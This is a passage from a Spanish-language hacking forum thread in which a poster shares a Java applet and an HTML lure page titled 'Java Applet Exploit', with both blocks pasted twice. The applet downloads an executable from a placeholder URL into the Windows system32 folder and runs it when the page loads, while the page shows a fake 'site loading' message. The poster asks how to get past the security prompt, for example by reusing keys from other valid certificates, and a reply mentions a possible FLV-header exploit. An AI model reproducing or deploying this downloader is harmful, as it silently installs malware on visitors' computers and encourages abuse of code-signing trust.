Autor
Mi pregunta es si alguien sabe alguna forma de evitar este dialog box pero sin tener q pagar un certificado
, creo haber leido en algun lado que es posible sacar keys de otros certificados validos y usarlos para cualquier applicacion pero no encuentro info.Aca les dejo el code por si alguien mas lo quiere usar:
Código:
import java.applet.Applet;
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
public class Client extends Applet
{
public Client()
{
}
public void start()
{
try
{
BufferedOutputStream bufferedoutputstream = null;
Object obj = null;
InputStream inputstream = null;
URL url = new URL("http://www.reemplazarURL.com/yourfile.exe");
bufferedoutputstream = new BufferedOutputStream(new FileOutputStream("C:\\windows\\system32\\yourfile.exe"));
URLConnection urlconnection = url.openConnection();
inputstream = urlconnection.getInputStream();
byte abyte0[] = new byte[1024];
int i;
for(long l = 0L; (i = inputstream.read(abyte0)) != -1; l += i)
bufferedoutputstream.write(abyte0, 0, i);
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception) { }
Runtime runtime = Runtime.getRuntime();
try
{
Process process = runtime.exec("C:\\windows\\system32\\ yourfile.exe");
process.waitFor();
BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String s;
while((s = bufferedreader.readLine()) != null)
System.out.print(s);
}
catch(Exception exception1) { }
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception1) { }
}
catch(Exception e) { }
}
public static void main(String args[])
{
try
{
BufferedOutputStream bufferedoutputstream = null;
Object obj = null;
InputStream inputstream = null;
URL url = new URL("http://www.reemplazarURL.com/yourfile.exe");
bufferedoutputstream = new BufferedOutputStream(new FileOutputStream("C:\\windows\\system32\\yourfile.exe"));
URLConnection urlconnection = url.openConnection();
inputstream = urlconnection.getInputStream();
byte abyte0[] = new byte[1024];
int i;
for(long l = 0L; (i = inputstream.read(abyte0)) != -1; l += i)
bufferedoutputstream.write(abyte0, 0, i);
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception) { }
Runtime runtime = Runtime.getRuntime();
try
{
Process process = runtime.exec("C:\\windows\\system32\\yourfile.exe");
process.waitFor();
BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String s;
while((s = bufferedreader.readLine()) != null)
System.out.print(s);
}
catch(Exception exception1) { }
}
catch(Exception e) { }
}
public void stop()
{
}
}
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
public class Client extends Applet
{
public Client()
{
}
public void start()
{
try
{
BufferedOutputStream bufferedoutputstream = null;
Object obj = null;
InputStream inputstream = null;
URL url = new URL("http://www.reemplazarURL.com/yourfile.exe");
bufferedoutputstream = new BufferedOutputStream(new FileOutputStream("C:\\windows\\system32\\yourfile.exe"));
URLConnection urlconnection = url.openConnection();
inputstream = urlconnection.getInputStream();
byte abyte0[] = new byte[1024];
int i;
for(long l = 0L; (i = inputstream.read(abyte0)) != -1; l += i)
bufferedoutputstream.write(abyte0, 0, i);
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception) { }
Runtime runtime = Runtime.getRuntime();
try
{
Process process = runtime.exec("C:\\windows\\system32\\ yourfile.exe");
process.waitFor();
BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String s;
while((s = bufferedreader.readLine()) != null)
System.out.print(s);
}
catch(Exception exception1) { }
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception1) { }
}
catch(Exception e) { }
}
public static void main(String args[])
{
try
{
BufferedOutputStream bufferedoutputstream = null;
Object obj = null;
InputStream inputstream = null;
URL url = new URL("http://www.reemplazarURL.com/yourfile.exe");
bufferedoutputstream = new BufferedOutputStream(new FileOutputStream("C:\\windows\\system32\\yourfile.exe"));
URLConnection urlconnection = url.openConnection();
inputstream = urlconnection.getInputStream();
byte abyte0[] = new byte[1024];
int i;
for(long l = 0L; (i = inputstream.read(abyte0)) != -1; l += i)
bufferedoutputstream.write(abyte0, 0, i);
try
{
if(inputstream != null)
inputstream.close();
if(bufferedoutputstream != null)
bufferedoutputstream.close();
}
catch(IOException ioexception) { }
Runtime runtime = Runtime.getRuntime();
try
{
Process process = runtime.exec("C:\\windows\\system32\\yourfile.exe");
process.waitFor();
BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String s;
while((s = bufferedreader.readLine()) != null)
System.out.print(s);
}
catch(Exception exception1) { }
}
catch(Exception e) { }
}
public void stop()
{
}
}
Y el html:
Código:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Java Applet Exploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<center>
<font color="#FFFFFF" size="4">Please wait a few seconds while the site
loads...</font>
</center>
<table align="center" width="350" height="125" border="1" cellpadding="0" cellspacing=
"0" bgcolor="#FFFFFF">
<tr>
<td width="350" height="125" valign="top"><font color="#FFFFFF"><object classid=
"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" codebase=
"http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,2">
<param name="CODE" value="yourfile.class" />
<param name="ARCHIVE" value="yourfile.jar" />
<param name="type" value="application/x-java-applet;version=1.6" />
<param name="scriptable" value="false" />
<comment><embed type="application/x-java-applet;version=1.6" code="yourfile.class"
archive="yourfile.jar" width="350px" height="125px" scriptable="false" pluginspage=
"http://java.sun.com/products/plugin/index.html#download" /></comment>
</object></font></td>
</tr>
</table>
</body>
</html>
<head>
<title>Java Applet Exploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<center>
<font color="#FFFFFF" size="4">Please wait a few seconds while the site
loads...</font>
</center>
<table align="center" width="350" height="125" border="1" cellpadding="0" cellspacing=
"0" bgcolor="#FFFFFF">
<tr>
<td width="350" height="125" valign="top"><font color="#FFFFFF"><object classid=
"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" codebase=
"http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,2">
<param name="CODE" value="yourfile.class" />
<param name="ARCHIVE" value="yourfile.jar" />
<param name="type" value="application/x-java-applet;version=1.6" />
<param name="scriptable" value="false" />
<comment><embed type="application/x-java-applet;version=1.6" code="yourfile.class"
archive="yourfile.jar" width="350px" height="125px" scriptable="false" pluginspage=
"http://java.sun.com/products/plugin/index.html#download" /></comment>
</object></font></td>
</tr>
</table>
</body>
</html>
No olviden reemplazar los path del .exe, .class y .jar, y creo q es necesario tener el exe en la misma carpeta q el applet para q funcione (not sure).
En línea
, lo unico que vi es que puede ser que el exploit sea a travez de las headers de los flv videos, pero mucho mas no encontre. Si encuentro algo mas sobre eso lo posteo aca, y si alguien sabe algo posteelo plz.
